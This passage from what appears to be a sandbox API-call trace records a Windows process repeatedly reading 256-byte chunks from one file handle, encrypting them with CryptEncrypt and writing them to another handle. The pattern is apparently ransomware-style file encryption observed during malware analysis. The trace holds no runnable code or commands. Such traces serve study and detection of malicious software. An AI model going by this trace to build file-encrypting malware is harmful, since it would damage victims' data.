lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.744] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.746] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.746] GetLastError () returned 0x0 [0144.746] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.748] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.748] GetLastError () returned 0x0 [0144.748] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.748] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.748] GetLastError () returned 0x0 [0144.748] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.748] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.748] GetLastError () returned 0x0 [0144.748] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.748] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.748] GetLastError () returned 0x0 [0144.748] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.748] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.748] GetLastError () returned 0x0 [0144.748] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.748] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.749] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.749] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.749] GetLastError () returned 0x0 [0144.749] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.750] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.750] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.750] GetLastError () returned 0x0 [0144.750] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.750] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.750] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.750] GetLastError () returned 0x0 [0144.750] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.750] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.750] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.750] GetLastError () returned 0x0 [0144.750] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.750] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.779] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.779] GetLastError () returned 0x0 [0144.779] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.779] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.779] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.779] GetLastError () returned 0x0 [0144.779] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.779] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.780] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.780] GetLastError () returned 0x0 [0144.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.780] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.780] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.780] GetLastError () returned 0x0 [0144.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.780] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.780] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.780] GetLastError () returned 0x0 [0144.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.780] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.780] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.780] GetLastError () returned 0x0 [0144.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.780] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.780] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.780] GetLastError () returned 0x0 [0144.780] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.781] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.781] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.781] GetLastError () returned 0x0 [0144.781] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.782] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.782] GetLastError () returned 0x0 [0144.782] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.782] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, 